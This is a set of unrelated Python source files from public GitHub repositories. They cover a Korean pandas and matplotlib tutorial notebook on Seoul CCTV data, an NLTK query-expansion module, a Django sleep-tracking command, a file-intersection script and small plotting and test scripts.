pop_Seoul.columns[4] : "고령자"}, inplace=True)
pop_Seoul.head()
# # 1-3 pandas 기초 익히기
# In[49]:
#모듈 불러오기
import pandas as pd
import numpy as np
# In[50]:
#pandas Series 사용(list 데이터)
s = pd.Series([1,3,5,np.nan,6,8]) #Series:list 데이터로 만든다
s
# In[51]:
#pandas data_range 사용(기본 날짜 설정)
dates = pd.date_range("20130101", periods=6)#periods=6 :2013년 01월 01일 부터 6일을 뽑아라
dates
# In[52]:
#데이터 프레임 생성
df = pd.DataFrame(np.random.randn(6,4), index=dates, columns=["A", "B", "C", "D"])
#np.random.randn(randn:가우시안 표준 정규 분포)
df
# In[53]:
#데이터프레임의 인덱스 보기
df.index
# In[54]:
#데이터 프레임의 columns 보기
df.columns
# In[55]:
#데이터 프레임의 내용물 보기(values)
df.values
# In[56]:
#데이터 프레임의 개요 보기(info())
df.info()
# In[57]:
#데이터 프레임의 통계적 개요 보기(describe())
df.describe() #values(내용물)이 숫자가 아니라 문자라도 그에 맞게 개요가 나타난다
# In[58]:
#sort_values(by=기준) 사용하기
df.sort_values(by="B", ascending=False)
# In[59]:
#데이터 프레임의 column으로 보기
df["A"]
# In[60]:
#데이터 프레임의 인덱스 0~3개 보기
df[0:3]
# In[61]:
#데이터 프레임의 특정 인덱스만 보기
df["20130102":"20130104"] # or df[1:3]
# In[62]:
#loc(location) 슬라이싱 사용(iloc와 차이점 알아두기!)
df.loc[dates[0]] #2013-01-01 -2.014368 0.540903 -1.209860 0.684123(index=dates, 가로로 추출)
# In[63]:
#loc로 a,b 행만 보기
df.loc[:,["A","B"]]#:=인덱스 모두
# In[64]:
#loc로 행과열 지정해서 보기
df.loc["20130102":"20130104",["A","B"]]
# In[65]:
#loc로 행과열 지정해서 보기2
df.loc["20130102",["A","B"]] # or df.loc[dates[1],["A","B"]]
# In[66]:
#iloc:loc 명령어와 달리 행과 열의 번호를 이용
df.iloc[3] #index[3],dates[3]의 뜻
# In[67]:
#iloc의 중요점!:왼쪽이 행,오른쪽이 열을 뜻한다(loc도 마찬가지, 다만 iloc는 번호를 이용한다!)
df.iloc[3:5,0:2]
# In[68]:
#iloc로 특정행과 열들을 골라서 보기
df.iloc[[1,2,4],[0,2]]
# In[69]:
#iloc로 전체범위 설정해서 보기
df.iloc[1:3,:]
# In[70]:
df.iloc[:,1:3]
# In[71]:
df
# In[72]:
#데이터프레임으로 조건으로 보기(True,False 형식)
df > 0 #True,False 형식으로 나옴
# In[73]:
#데이터프레임으로 조건으로 보기(리스트 형식)
df[df > 0]
# In[74]:
#데이터 프레임 복사하기(copy
df2 = df.copy()
# In[75]:
#데이터 프레임의 칼럼 추가하기
df2["E"] = ["one", "one", "two", "three", "four", "three"]
df2
# In[76]:
#데이터프레임의 특정 컬럼에 조건 걸기(isin)
df2["E"].isin(["four","three"])
# In[77]:
#데이터프레임의 특정 컬럼에 조건 걸기(isin) 리스트 형태
df2[df2["E"].isin(["four","three"])]
# In[78]:
#데이터 프레임에 특정 함수 적용(apply)
df.apply(np.cumsum) #누적합 함수
# In[79]:
#one-line 함수의 lambda
df.apply(lambda x: x.max() - x.min())
# # 1-4 pandas 이용해서 CCTV와 인구 현황 데이터 파악하기
# In[80]:
#데이터 확인 하기
CCTV_Seoul.head()
# In[81]:
#소계를 기준으로 내림차순 하기
CCTV_Seoul.sort_values(by="소계", ascending=True).head()
#도봉구,마포구,송파구,중랑구,중구 순으로 적은것을 확인
# In[82]:
#소계를 기준으로 오름차순 하기
CCTV_Seoul.sort_values(by="소계", ascending=False).head()
#강남구,양천구,서초구,은평구,용산구 순으로 많은것을 확인
# In[83]:
#최근증가율 컬럼을 만들고 그속에 최근 3년간 cctv증가율 계산한것을 넣기(2014+2015+2016 / 2013)
CCTV_Seoul["최근증가율"] = (CCTV_Seoul["2016년"] + CCTV_Seoul["2015년"] + CCTV_Seoul["2014년"]) / CCTV_Seoul["2013년도 이전"] * 100
CCTV_Seoul.sort_values(by="최근증가율", ascending=False)
# In[84]:
#서울시 데이터 확인
pop_Seoul.head()
# In[85]:
#필요없는 행 지우기(drop)
pop_Seoul.drop([0], inplace=True)
pop_Seoul
# In[86]:
#unique 칼럼 보기(중복 데이터 거르기)
pop_Seoul["구별"].unique()
#nan값 확인
# In[87]:
#nan값이 어디 있는지 확인하기(isnull)
pop_Seoul[pop_Seoul["구별"].isnull()]
# In[88]:
#nan값 있는 행 삭제하기
pop_Seoul.drop([26], inplace=True)
# In[89]:
pop_Seoul.tail()
# In[90]:
#전체 인구로 외국인 비율과 고령자 비율 계산후 칼럼 만들기
pop_Seoul["외국인비율"] = (pop_Seoul["외국인"] / pop_Seoul["인구수"]) * 100
pop_Seoul["고령자비율"] = (pop_Seoul["고령자"] / pop_Seoul["인구수"]) * 100
pop_Seoul.head()
# In[91]:
#인구수 기준으로 정렬하기
pop_Seoul.sort_values(by="인구수",ascending=False).head()
# In[92]:
#외국인 기준으로 정렬하기
pop_Seoul.sort_values(by="외국인",ascending=False).head()
# In[93]:
#외국인비율 기준으로 정렬하기
pop_Seoul.sort_values(by="외국인비율",ascending=False).head()
# In[94]:
#고령자 기준으로 정렬하기
pop_Seoul.sort_values(by="고령자",ascending=False).head()
# In[95]:
#고령자비율 기준으로 정렬하기
pop_Seoul.sort_values(by="고령자비율",ascending=False).head()
# # 1.5 pandas의 고급기능 두 데이터 병합하기
# In[96]:
#연습용 데이터 프레임 3개 만들기
df1 = pd.DataFrame({"A":["A0","A1","A2","A3"],
"B":["B0","B1","B2","B3"],
"C":["C0","C1","C2","C3"],
"D":["D0","D1","D2","D3"]},index=[0,1,2,3])
df2 = pd.DataFrame({"A":["A4","A5","A6","A7"],
"B":["B4","B5","B6","B7"],
"C":["C4","C5","C6","C7"],
"D":["D4","D5","D6","D7"]},index=[4,5,6,7])
df3 = pd.DataFrame({"A":["A8","A9","A10","A11"],
"B":["B8","B9","B10","B11"],
"C":["C8","C9","C10","C11"],
"D":["D8","D9","D10","D11"]},index=[8,9,10,11])
# In[97]:
#df1 데이터프레임 확인
df1.head()
# In[98]:
#df2 데이터프레임 확인
df2.head()
# In[99]:
#df3 데이터프레임 확인
df3.head()
# In[100]:
#데이터를 열방향으로 합치기(concat)
result = pd.concat([df1, df2, df3])
result
# In[101]:
#concat에 option(keys)
result = pd.concat([df1, df2, df3], keys = ["x", "y", "z"]) #keys = 다중 index으로 설정되어 level을 형성
result
# In[102]:
#result의 인덱스 확인
result.index
# In[103]:
#result index에서 level values(0)을 확인
result.index.get_level_values(0)
# In[104]:
#result index에서 level values(1)을 확인
result.index.get_level_values(1)
# In[105]:
#df4 생성하고 df1과 df4를 axis(1)로 concat하기
df4 = pd.DataFrame({"B":["B2","B3","B6","B7"],
"D":["D2","D3","D6","D7"],
"F":["F2","F3","F6","F7"]},index = [2, 3, 6, 7])
result = pd.concat([df1, df4], axis=1)
# In[106]:
#df1 확인
df1
# In[107]:
#df4 확인
df4
# In[108]:
#axis(1)한 result 확인
result #df4:index = [2, 3, 6, 7]
#concat 명령어는 index 기준으로 합친다는 것을 알수 있다.
#값을 가질수 없는 곳은 null값으로 처리된다 -> null 값 처리 대신 버리게 하는것:join="inner"
# In[109]:
#공통되지 않는 index의 데이터는 버리도록 하는 옵션(join="inner")
result = pd.concat([df1, df4], axis=1, join="inner")
# In[110]:
result
#문제점:null값 있는 곳을 삭제했더니 데이터가 있었던 곳도 전부 삭제되었다.
# In[111]:
#df1의 인덱스에 맞추도록 하자(join_axes=[df1.index])
result = pd.concat([df1, df4], axis=1, join_axes=[df1.index])
result
#문제점:df4의 나머지 인덱스은 합쳐지지 않고 삭제되었다.
# In[112]:
#열을 기준으로 합치는데 index를 무시하고 병합하자(ignore_index=True)
result = pd.concat([df1, df4], ignore_index=True)
result
# In[113]:
#left, right 데이터 두개 만들기
left = pd.DataFrame({"key":["K0", "K4", "K2", "K3"],
"A":["A0","A1","A2","A3"],
"B":["B0","B1","B2","B3"]})
right = pd.DataFrame({"key":["K0", "K1", "K2", "K3"],
"C":["C0","C1","C2","C3"],
"D":["D0","D1","D2","D3"]})
# In[114]:
#left 데이터 확인
left
# In[115]:
#right 데이터 확인
right
# In[116]:
#merge 명령어로 병합하기(on 옵션)
pd.merge(left, right, on = "key")
#key 열 기준으로 공통된것만 합친다(나머지는 삭제)
# In[117]:
#merge 명령어로 병합하기(how 옵션) ->left를 기준으로 설정
pd.merge(left, right, how="left", on = "key")
#left 데이터
#0 K0 A0 B0
#1 K4 A1 B1
#2 K2 A2 B2
#3 K3 A3 B3
#right 데이터
#0 K0 C0 D0
#1 K1 C1 D1
#2 K2 C2 D2
#3 K3 C3 D3
# In[118]:
#merge 명령어로 병합하기(how 옵션) -> right를 기준으로 설정
pd.merge(left, right, how="right", on = "key")
#left 데이터
#0 K0 A0 B0
#1 K4 A1 B1
#2 K2 A2 B2
#3 K3 A3 B3
#right 데이터
#0 K0 C0 D0
#1 K1 C1 D1
#2 K2 C2 D2
#3 K3 C3 D3
# In[119]:
#merge의 합집합(how="outer")
pd.merge(left, right, how="outer", on = "key")
# In[120]:
#merge의 교집합(how="inner")
pd.merge(left, right, how="inner", on = "key")
# # 1-6 CCTV 데이터와 인구 현황 데이터를 합치고 분석하기
# In[121]:
#merge 명령으로 두데이터 합치기
data_result = pd.merge(CCTV_Seoul, pop_Seoul, on="구별")
data_result.head()
# In[122]:
#의미 없는 칼럼 삭제(drop[행],del[열])
del data_result["2013년도 이전"]
del data_result["2014년"]
del data_result["2015년"]
del data_result["2016년"]
data_result.head()
# In[123]:
#칼럼중 하나("구별")를 인덱스로 설정(set_index)
data_result.set_index("구별", inplace=True)
data_result
# ## 상관관계 분석(np.corrcoef)
# * 0.1 이하:무시
# * 0.3 이하:약한 상관관계
# * 0.7 이하:뚜렷한 상관관계
# * 결과는 행렬로 나타난다, 주 대각선을 기준으로 대칭인 행렬이고 대각선을 빼고 다른 값을 읽으면 된다.
# In[124]:
#고령자 비율과 소계의 상관관계 분석
np.corrcoef(data_result["고령자비율"],data_result["소계"])
# In[125]:
#외국인 비율과 소계의 상관관계 분석
np.corrcoef(data_result["외국인비율"],data_result["소계"])
# In[126]:
#인구수와 소계의 상관관계 분석
np.corrcoef(data_result["인구수"],data_result["소계"])
#0.3 이하 이므로 약한 상관관계라는것을 알수 있다.
# In[127]:
#소계를 기준으로 내림차순 하기(sort_values)
data_result.sort_values(by="소계", ascending=False).head()
# # 1-7 파이썬의 대표 시각화 도구-matplotlib
# In[131]:
#모듈 불러오기
import matplotlib.pyplot as plt
get_ipython().magic('matplotlib inline')
import numpy as np
#결과를 바로 보여주기(plt.show()를 안써도 된다)
# In[130]:
#간단한 그래프 생성
plt.figure
plt.plot([1,2,3,4,5,6,7,8,9,8,7,6,5,4,3,2,1,0])
#plt.show()
# In[132]:
#arange와 sin 사용
t = np.arange(0,12,0.01) #0~12까지 0.01 간격으로 생성
y = np.sin(t)
# In[133]:
#sin 함수 그래프 그리기
plt.figure(figsize=(10,6))
plt.plot(t, y)
#plt.show()
# In[138]:
#sin 함수 그래프 그리기(label,grid,title 옵션 적용)
plt.figure(figsize=(10,6))
plt.plot(t, y)
plt.grid()
plt.xlabel("time")
plt.ylabel("Amplitude(진폭)")
plt.title("Example of sinewave")
#plt.show()
# ## 그래프 한글 인코딩 코드
# In[137]:
import platform
from matplotlib import font_manager, rc
path = "c:/Windows/Fonts/malgun.ttf"
if platform.system() == 'Darwin':
rc('font', family='AppleGothic')
elif platform.system() == 'Windows':
font_name = font_manager.FontProperties(fname=path).get_name()
rc('font', family=font_name)
else:
print('Unknown system... sorry~~~~')
plt.rcParams["axes.unicode_minus"] =False
# In[139]:
#plot 두개를 한 화면 생성(legend(범례) 옵션 적용)
plt.figure(figsize=(10,6))
plt.plot(t, np.sin(t), label="sin")
plt.plot(t, np.cos(t), label="cos")
plt.grid()
plt.legend()
plt.xlabel("time")
plt.ylabel("Amplitude")
plt.title("Example of sinewave")
#plt.show()
# In[140]:
#lw(선의 굵기),color(색상 지정)
plt.figure(figsize=(10,6))
plt.plot(t, np.sin(t), lw=3, label="sin")
plt.plot(t, np.cos(t), "r", label="cos") #r:red -> color="red"
plt.grid()
plt.legend()
plt.xlabel("time")
plt.ylabel("Amplitude")
plt.title("Example of sinewave")
#plt.show()
# In[146]:
#임의의 두 데이터 생성후 그래프 그리기
t = [0, 1, 2, 3, 4, 5, 6]
y = [1, 4, 5, 8, 9, 5, 3]
plt.figure(figsize=(10,6))
plt.plot(t, y, color="green")
#plt.show()
# In[147]:
#line style 지정
plt.figure(figsize=(10,6))
plt.plot(t,y, color="green", linestyle="dashed")
#linestyles = ['-', '--', '-.', ':']
#('solid', 'solid') # Same as (0, ()) or '-'
#('dotted', 'dotted') # Same as (0, (1, 1)) or '.'
#('dashed', 'dashed') # Same as '--'
#('dashdot', 'dashdot')
#plt.show()
# In[149]:
#marker 옵션 지정
plt.figure(figsize=(10,6))
plt.plot(t, y, color="green", linestyle="dashed", marker="o")
#marker 표시명령어 = https://matplotlib.org/3.1.1/api/markers_api.html
#plt.show()
# In[155]:
#marker 색상과 크기 지정(markerfacecolor, markersize)
plt.figure(figsize=(10,6))
plt.plot(t, y, color='green', linestyle='dashed', marker='o',
markerfacecolor = 'blue', markersize=12)
plt.xlim([-0.5, 6.5])
plt.ylim([0.5, 9.5])
#plt.show()
# In[156]:
#scatter(흩어지게 하다)로 그래프 그리기
#데이터 생성
t = np.array([0,1,2,3,4,5,6,7,8,9])
y = np.array([9,8,7,9,8,3,2,4,3,4])
#scatter 그래프 그리기
plt.figure(figsize=(10,6))
plt.scatter(t,y)
#plt.show()
# In[157]:
#scatter의 marker 지정
plt.figure(figsize=(10,6))
plt.scatter(t,y, marker=">")
#plt.show()
# In[158]:
#축 값에 따라 색상을 바꾸는 color map 지정
colormap = t
plt.figure(figsize=(10,6))
plt.scatter(t,y, s = 50, c = colormap, marker=">")#s = 50 marker 사이즈
plt.colorbar()
#plt.show()
# In[159]:
#numpy의 랜덤변수 함수로 데이터 세개 생성
s1 = np.random.normal(loc=0, scale=1, size=1000)
s2 = np.random.normal(loc=5, scale=0.5, size=1000)
s3 = np.random.normal(loc=10, scale=2, size=1000)
# In[160]:
#랜덤변수 데이터 그래프 그리기
plt.figure(figsize=(10,6))
plt.plot(s1, label="s1")
plt.plot(s2, label="s2")
plt.plot(s3, label="s3")
plt.legend()
#plt.show()
# In[161]:
#boxplot으로 그래프 그리기
plt.figure(figsize=(10,6))
plt.boxplot((s1, s2, s3))
plt.grid()
#plt.show()
# # 1-8 CCTV 현황 그래프로 분석하기
# In[162]:
#데이터 확인
data_result.head()
# In[163]:
#plot 붙여서 그래프 바로 그리기
data_result["소계"].plot(kind="barh", grid=True, figsize=(10,10)) #barh:수평방향, bar:수직방향
#plt.show()
# In[164]:
#plot 붙여서 정렬하고 수평 그래프 바로 그리기
data_result["소계"].sort_values().plot(kind="barh", grid=True, figsize=(10,10)) #barh:수평방향, bar:수직방향
#plt.show()
# In[165]:
#CCTV 비율 계산해서 칼럼 만들고 그래프 그리기
data_result["CCTV비율"] = data_result["소계"] / data_result["인구수"] * 100
data_result["CCTV비율"].sort_values().plot(kind="barh", grid=True, figsize=(10,10))
#plt.show()
# In[166]:
#scatter로 그래프 그리기
plt.figure(figsize=(6,6))
plt.scatter(data_result["인구수"], data_result["소계"], s=50)
plt.xlabel("인구수")
plt.ylabel("CCTV")
plt.grid()
#plt.show()
# In[167]:
#데이터를 대표하는 직선을 그리기
fp1 = np.polyfit(data_result["인구수"], data_result["소계"], 1) #세번쨰 인자는 찾고자 하는 함수의 차수입니다. 2를 넣어주면 2차식의 계수를 찾아달라
fp1
# In[168]:
#직선을 그리기 위해 x축과 y축 데이터 얻기
f1 = np.poly1d(fp1) #x축
fx = np.linspace(100000, 700000, 100) #y축
#자세한 설명은 https://pinkwink.kr/1127 사이트 참고
# In[169]:
plt.figure(figsize=(10,10))
plt.scatter(data_result["인구수"], data_result["소계"], s=50)
plt.plot(fx, f1(fx), ls="dashed", lw=3, color="g")
plt.xlabel("인구수")
plt.ylabel("CCTV")
plt.grid()
#plt.show()
# In[170]:
#두가지를 추가
#1. 직선이 전체 데이터의 대표값 역할(인구수가 300000 일때 cctv는 1100정도)이면 그 경향에서 멀리 떨어진 구는 이름이 같이 나타나도록 한다.
#2. 직선에서 멀어질수록 다른 색을 나타내도록 한다
#1.오차를 계산할수 있는 코드 생성후 오차가 큰 순으로 데이터를 정렬
#데이터를 대표하는 직선을 그리기
fp1 = np.polyfit(data_result["인구수"], data_result["소계"],1)
#직선을 그리기 위해 x축과 y축 데이터 얻기
f1 = np.poly1d(fp1)
fx = np.linspace(100000, 700000, 100)
#오차 칼럼 만들기
data_result["오차"] = np.abs(data_result["소계"] - f1(data_result["인구수"]))#np.abs:절대값을 구하는 함수
#오차를 기준으로 정렬하고 df_sort 데이터 생성
df_sort = data_result.sort_values(by="소계", ascending=False)
df_sort.head()
# In[171]:
#2. 텍스트와 color map
plt.figure(figsize=(14,10))
plt.scatter(data_result["인구수"],data_result["소계"],
c=data_result["오차"], s=50)
plt.plot(fx, f1(fx), ls="dashed", lw=3, color="g")
for n in range(10):
plt.text(df_sort["인구수"][n]*1.02, df_sort["소계"][n]*0.98,
df_sort.index[n], fontsize=15)
plt.xlabel("인구수")
plt.ylabel("인구당비율")
plt.colorbar()
plt.grid()
#plt.show()
| [
"noreply@github.com"
] | lemontree0626.noreply@github.com |
8b1597e6c4cbae6ebf1369434d965beb7449a14c | f0aba4e96b36c9b06c6af3c058f56693e4be9a3a | /query_expansion.py | 0188ca10dc3bc70203ff58cd6f74b77ba6a396eb | [] | no_license | j00n44th44n/VGM_SRI | c14b510b8b2628e3f9c55ea2f8c7d102051edde5 | 5d9f9b94d48351a93a5d120479f25756bebae048 | refs/heads/master | 2022-02-22T12:19:11.604215 | 2019-10-16T13:58:57 | 2019-10-16T13:58:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,999 | py | from nltk.corpus import stopwords
from string import punctuation
from nltk import wordpunct_tokenize
import json
import modelo
import index
from nltk.corpus import wordnet as wn
from langdetect import detect
def start(json_request):
    """Answer a JSON query request using pseudo-relevance feedback.

    Runs the raw query once, expands it with the top terms of the retrieved
    documents (and, for English queries, with WordNet synonyms), then runs
    the expanded query and returns that second result.
    """
    request = json.loads(json_request)
    query = request['query']
    count = request['count']
    techniques = request['similarity_techniques']
    # First pass: retrieve documents for the raw query.
    first_pass = json.loads(modelo.request_query(query, count, techniques))
    docs = [hit["document"] for hit in first_pass['results']]
    # Build the expanded query: original terms + feedback terms (+ synonyms).
    parts = [query, pseudo_Relevance_Feedback(docs)]
    if detect(query) == 'en':
        parts.append(expansion_synonyms(query))
    # Second pass with the expanded query.
    return modelo.request_query(" ".join(parts), count, techniques)
def pseudo_Relevance_Feedback(documents):
    """Return the most frequent term of each document, space-joined (deduplicated)."""
    top_terms = set()
    for document in documents:
        payload = json.dumps({'action': 'terms_frec', 'key': document})
        response = json.loads(index.start(payload))
        # response['terms'] holds (term, frequency) pairs; keep the term
        # with the highest frequency for this document.
        best_term, _ = max(response['terms'], key=lambda pair: pair[1])
        top_terms.add(best_term)
    return " ".join(top_terms)
def expansion_synonyms(data):
    """Collect WordNet synonyms for the content words of *data*.

    Tokenizes the text, discards Spanish/English stopwords, punctuation
    (including Spanish inverted marks) and single digits, then gathers up
    to two synonym lemma names per remaining token.

    Returns the collected synonyms joined by single spaces.
    """
    # Sets make the membership tests below O(1) instead of O(n) per token.
    all_stopwords = set(stopwords.words('spanish')) | set(stopwords.words('english'))
    non_words = set(punctuation)
    # we add spanish punctuation
    non_words.update(['¿', '¡'])
    non_words.update(map(str, range(10)))
    tokens = [tok for tok in wordpunct_tokenize(data)
              if tok not in all_stopwords and tok not in non_words]
    words = []
    for token in tokens:
        synonyms = []
        for syn in wn.synsets(token):
            for lemma in syn.lemmas():
                name = lemma.name()
                # Deduplicate while preserving WordNet order, so the two
                # synonyms picked below are deterministic.  The original
                # list(set(...))[:2] picked an arbitrary pair and also left
                # a debug print(token) in the loop.
                if name not in synonyms:
                    synonyms.append(name)
        words.extend(synonyms[:2])
    return " ".join(words)
| [
"victorernesto23@gmail.com"
] | victorernesto23@gmail.com |
64262c2cfe6686d0dc92b2b645a5bb50c0b2ae6a | d722ebbcd7856e2fd76173b6dffb64acce78c898 | /tests.py | 431e220819a84c8bb5512702a53f390cef4276d4 | [] | no_license | bevesce/convert_currency | cccd9de97673307386aec9e5b60822383df8804b | 6273ca0f9e32df6b0a4b1f3d29e8a46efaa69f56 | refs/heads/master | 2021-06-03T03:09:19.524643 | 2016-09-24T13:29:08 | 2016-09-24T13:29:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 195 | py | import unittest
import convert_currency as c
# Smoke checks: call convert_currency with an amount alone, with a source
# currency, and with one and then two target currencies appended.
print(c.convert_currency('1'))
print(c.convert_currency('1 eur'))
print(c.convert_currency('1 eur zł'))
print(c.convert_currency('1 eur zł usd'))
| [
"bevesce@gmail.com"
] | bevesce@gmail.com |
ded443c1b9aa98d41b6473871b774a326b7ffcdb | 042e55c3a527cfe0ca89e8e83363cdd0f3fd3847 | /PlotNetwork/PlotTrends.py | 3c3f8ac175b26e893f76a7db6bc6f63381700d72 | [] | no_license | Joan93/BigData | f1caa30cbbb64adb5b0bb9e7422e081375ef9546 | ed0870e3bdb432fb3e74e456bcb97f9a44c6a651 | refs/heads/master | 2016-09-13T12:07:41.395413 | 2016-06-07T12:03:48 | 2016-06-07T12:03:48 | 56,164,440 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,355 | py | import matplotlib.pyplot as plt
import matplotlib.dates as dte
import networkx as nx
import numpy as np
import time
import fileinput
import os
import re
from datetime import datetime
def atoi(text):
    """Convert *text* to int when it is all digits; otherwise return it unchanged."""
    if text.isdigit():
        return int(text)
    return text
def natural_keys(text):
    '''
    Sort key for human ("natural") ordering: digit runs compare numerically,
    so e.g. "file2" sorts before "file10".
    alist.sort(key=natural_keys) sorts in human order
    http://nedbatchelder.com/blog/200712/human_sorting.html
    '''
    # Split on runs of digits -- the capturing group keeps them in the
    # result -- and convert each digit run to an int.
    return [int(chunk) if chunk.isdigit() else chunk
            for chunk in re.split(r'(\d+)', text)]
# Plot one PNG of bicycle availability over time per station dump file.
ListOfTimes =[]
ListOfBicycles=[]
ListOfRealTime=[]
ListOfSlots=[]
# degree_sequence=[1,5,9,10,2,6,7]
# time_sequence=[0,2,3,4,5,6,8]
# plt.plot(time_sequence,degree_sequence)
# # plt.xlabel(time_sequence)
# plt.show()
FolderPath="/home/ns3/Documents/BicingProject/BigData/Process_Data/Station/"
# Process the .dat station dumps in natural (human) order: 1, 2, ..., 10, 11.
files = [f for f in os.listdir(FolderPath) if f.endswith(".dat")]
files.sort(key=natural_keys)
for file in files:
    # Reset the per-station accumulators for every file.
    ListOfTimes = []
    ListOfBicycles = []
    ListOfRealTime = []
    ListOfSlots = []
    with open(FolderPath+file,"r") as fid:
        for line in fid:
            # Records are space-separated; fields within a record are
            # ';'-separated.  Field 1 looks like a day/slot code and field 2
            # a bicycle count -- TODO confirm against the dump producer.
            f = line.split(' ')
            #print f
            for element in f:
                g=element.split(';')
                #print len(g)
                if len(g)>1:
                    ListOfTimes.append(int(g[1]))
                    ListOfBicycles.append(int(g[2]))
        fid.close()  # redundant: the with-block already closes the file
    #print ListOfBicycles
    #print ListOfTimes
    for element in ListOfTimes:
        # Decode the code: thousands part = day of month, remainder = the
        # 3-minute slot within that day.
        dia,slot=divmod(element,1000)
        minute=slot*3
        hora,minuto=divmod(minute,60)
        tiempo2=datetime(2012, 5, dia, hora, minuto)
        # Zero-pad the components for the human-readable string below.
        if hora<10:
            hora="0"+str(hora)
        if minuto<10:
            minuto="0"+str(minuto)
        if dia<10:
            dia="0"+str(dia)
        # NOTE(review): 'cadena' claims month 12 while tiempo2 uses month 5;
        # cadena is only consumed by the commented-out debug prints.
        cadena="2012/12/" + str(dia)+ " " + str(hora) + ":" + str(minuto)
        #print cadena
        #print tiempo2
        #print cadena, tiempo2
        ListOfRealTime.append(tiempo2)
    #print "aaaaaaaa"
    #print len(ListOfBicycles),len(ListOfRealTime), len(ListOfTimes)
    # Plot availability over time and save one figure per station.
    plt.plot(ListOfRealTime, ListOfBicycles)
    plt.gcf().autofmt_xdate()
    plt.title(file)
    plt.grid()
    plt.savefig("/home/ns3/Documents/BicingProject/BigData/PlotNetwork/StationGraphs/BIGBicycle_usage_"+file +".png")
    print "File " +file+".png saved"
    plt.close() #plt.show()
| [
"anacristina9111@gmail.com"
] | anacristina9111@gmail.com |
c8702fa0a5f08e219d3cf1c79cf015c2757188cf | 119ef694755b3a202d40d2212b4e2c9e83f521aa | /slogger/management/commands/total_hours.py | bb10f59509025115b4569bfcc1cc01be264d2b37 | [
"MIT"
] | permissive | andreas-hofmann/besdd | f9363594dd3a16bb54f7ca63d0e5a61cce10293b | 64e277ff1087ecf429d04f30443f7a34dc15f2f7 | refs/heads/master | 2023-08-29T22:50:48.859521 | 2021-11-17T20:07:04 | 2021-11-17T20:07:04 | 260,469,575 | 1 | 0 | MIT | 2021-11-17T20:07:05 | 2020-05-01T13:46:52 | Python | UTF-8 | Python | false | false | 567 | py | from django.core.management.base import BaseCommand, CommandError
from slogger.models import SleepPhase, Child
def total_sleep(child_id):
    """Print the summed duration, in hours, of every SleepPhase of *child_id*."""
    total_seconds = sum(
        phase.duration_sec()
        for phase in SleepPhase.objects.filter(child_id=child_id)
    )
    print(f"Total sleep duration: {total_seconds/3600} hours.")
class Command(BaseCommand):
    """Management command: print the total recorded sleep time for one child."""
    help = 'Calculates the total sleep time for a child.'

    def add_arguments(self, parser):
        # Required positional argument: the primary key of the child.
        parser.add_argument('child_id', type=int)

    def handle(self, *args, **options):
        # Delegate to the module-level helper, which prints the result.
        total_sleep(options['child_id'])
"mail@andreas-hofmann.org"
] | mail@andreas-hofmann.org |
6bcf655043f1afe586f3430383b787870f6ddc59 | 21d20ac35dd4127bd7c349ea5acc8c7f844ab6d2 | /hibernateConversion/antidiff.py | bfc36840c389704948fcee9f8ff761c7ef6b529a | [] | no_license | mcfa77y/python | 78646afa949619f7c4f07106e10e14129706de28 | e30ba2e21f3f1081d13b706dbfebd266f7157274 | refs/heads/master | 2021-01-20T08:47:31.895049 | 2015-03-19T15:26:11 | 2015-03-19T15:26:11 | 10,113,769 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,484 | py | #!/usr/bin/python
import sys, re
from sets import Set
def main():
    """Read an index file (argv[1]) of file names and anti-diff the listed files."""
    index = open(sys.argv[1], 'r')
    # this gets file names from an index file
    # and puts them into a list
    f=[]
    for line in index:
        # Paths in the index are relative to this user's home directory.
        line = "/home/jlau/"+line
        line = re.sub('\r\n','',line)  # strip Windows line endings
        f.append(line)
    # NOTE(review): f0/f1 are opened but never used and never closed.
    f0 = open(f[0], 'r')
    f1 = open(f[1], 'r')
    # run mergesort
    ms(f)
#merge sort: recursively split the list of file names; merge() combines halves
def ms(rist):
    # Debug trace of the current sub-list size (Python 2 print statement).
    print len(rist)
    if len(rist)<2:
        # Leaf: a single file name, returned as a one-element list.
        return rist
    else:
        middle = len(rist)/2
        left = ms(rist[:middle])
        right = ms(rist[middle:])
        return merge(left, right)
# merge: this is where the main logic occurs.  Each node is either a leaf
# (a one-element list holding a file name) or a pair (names, common_lines)
# produced by a previous merge.
def merge(a, b):
    if(a!=None and b!=None):
        # Debug dump of both sub-results (Python 2 print statements).
        print "a\n"+str(a)
        print "\nb\n"+str(b)
        print ""
        # if the list size is one then
        # file to set
        # else use the already merged set
        if len(a)==1:
            aSet = fileToSet(a[0])
        else:
            aSet =Set(a[1])
        if len(b)==1:
            bSet = fileToSet(b[0])
        else:
            bSet=Set(b[1])
        # antiDiff the two sets
        results = [a,b],antiDiff(aSet,bSet)
    elif a!=None:
        # Only one side present: promote it as-is.
        aSet = fileToSet(a[0])
        results = a, aSet
    else:
        bSet = fileToSet(b[0])
        results = b,bSet
    return results
# turn a file name into a set: one entry per non-blank line of the file,
# keeping only the first whitespace-separated token of each line
def fileToSet(fn):
    s=Set()
    f = open(fn,'r')
    for line in f:
        if len(line.split())>0:
            line=line.split()[0]  # keep only the first column
            s.add(line)
    return s
# get the intersection of the sets, printed as a numbered listing
def antiDiff(s0,s1):
    s3 = list(s0&s1)
    s3.sort()
    print ""
    i=0
    for x in s3:
        i+=1
        print str(i)+" "+x  # "N match" line per common entry
    print "\ntotal matches: "+str(len(s3))
    return s3
main()  # script entry point: runs immediately when the file is executed
| [
"mcfa77y@github.com"
] | mcfa77y@github.com |
924df1526f8c4dc54ee375fbbb0b677dde347bd6 | ff0881743b77061bf65e3072a8517f38d99b7516 | /playground2.py | ce354d229b47037b67dd6d925ba8251c0a926122 | [] | no_license | kevkim11/Ocean_Optics_STS_VIS_Python | 9b4e3d248f7c14b4c77154d01e606501503c65a3 | 17ba4d85abdbedc08b3d7d30f4460e7e9b8cd222 | refs/heads/master | 2021-01-19T04:06:31.532612 | 2017-11-08T04:39:42 | 2017-11-08T04:39:42 | 87,351,424 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 269 | py | import matplotlib.pyplot as plt
import numpy as np
import time
# Incrementally plot ten points on one figure, redrawing after each one.
f = plt.figure()
ax = f.gca()
f.show()
for i in range(10):
    ax.plot(i, i, 'ko')  # black circle marker at (i, i)
    f.canvas.draw()      # force a redraw so the new point appears now
    print "drawn "+str(i)
    time.sleep(2)
    # raw_input('pause : press any key...')
# f.close()
| [
"pao-lin@comcast.net"
] | pao-lin@comcast.net |
